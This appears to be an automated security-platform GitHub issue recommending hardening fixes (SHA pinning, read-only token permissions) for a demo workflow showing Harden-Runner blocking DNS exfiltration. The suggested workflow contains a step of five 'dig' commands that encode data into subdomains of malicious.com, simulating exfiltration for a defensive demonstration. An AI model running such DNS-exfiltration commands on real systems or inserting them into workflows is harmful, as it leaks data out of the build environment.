Harden GitHub Actions Workflow - block-dns-exfiltration.yaml #240
Description
Summary
This issue is created by StepSecurity related to security issues in block-dns-exfiltration.yaml . The platform has identified 2 vulnerabilities (1 critical, 1 high, 0 medium, 0 low).
Remediation Overview
The platform can generate remediations for a few vulnerabilities. For such vulnerabilities, you can find the fixed workflow file in the Suggested Fix For Auto-Remediable Issues section. You can manually deploy these changes or create a pull request by commenting @stepsecurity-int pull-request create on this issue.
If you’d like an automated pull request with the fixed workflow file, comment:
@stepsecurity-int pull-request create
Other issues require manual investigation and changes.
Once a vulnerability has been remediated, ✅ will appear in the title. Note that it may take up to 24 hours for these issues to be updated.
Please review the individual vulnerability section below and follow the recommended resolution steps.
Security Checks Details
❌ GITHUB_TOKEN should have minimum permissions
-
Severity: High
-
Description: This check passes if the job's GITHUB_TOKEN does not have all the read and write permissions.
-
Resolution: Set minimum GitHub token permissions at the job or workflow level.
-
Automated Remediation Available ?: true
-
References:
❌ Actions should be pinned to a full-length commit SHA
-
Severity: Critical
-
Description: GitHub Action tags and Docker tags are mutable. This poses a security risk. GitHub's Security Hardening guide recommends pinning actions to full length commit.
-
Resolution: Pin Actions to a full-length commit SHA..
-
Automated Remediation Available ?: true
-
References:
Suggested Fix For Auto-Remediable Issues
Below is the updated workflow, which fixes the following security vulnerabilities:
-
GITHUB_TOKEN should have minimum permissions
-
Actions should be pinned to a full-length commit SHA
name: Block DNS Exfiltration With Harden-Runner
on:
workflow_dispatch:
+ permissions:
+ contents: read
jobs:
build:
name: Deploy
runs-on: ubuntu-latest
steps:
- name: Harden Runner
uses: step-security/harden-runner@
+ cb605e52c26070c328afc4562f0b4ada7618a84e #
v2
+ .10.4
with:
egress-policy: block
allowed-endpoints: |
github.com:443
- name: Code Checkout
uses: actions/checkout@
+ 11bd71901bbe5b1630ceea73d27597364c9af683 #
v4
+ .2.2
# DNS Data Exfiltration
- name: DNS Data Exfiltration
run: |
dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.comAdditional Information
For more information, refer to the documentation page here.
Please don't make any changes in the description as the platform makes automated updates in description. Please use the comment section below to provide input.
Automated remediation commands and options
- Create a pull request with automated security fixes
@stepsecurity-int pull-request create- Close this issue and prevent it from being reopened
@stepsecurity-int issue close <REASON>- Update issue description with latest security check status
@stepsecurity-int issue force-update- View all available commands and their usage
@stepsecurity-int helpWhich GitHub Actions security best practices were evaluated?
The workflow was evaluated for the following GitHub Actions security best practices:
- Network & runtime security monitoring
- Token permissions
- Third‐party GitHub Actions usage & pinning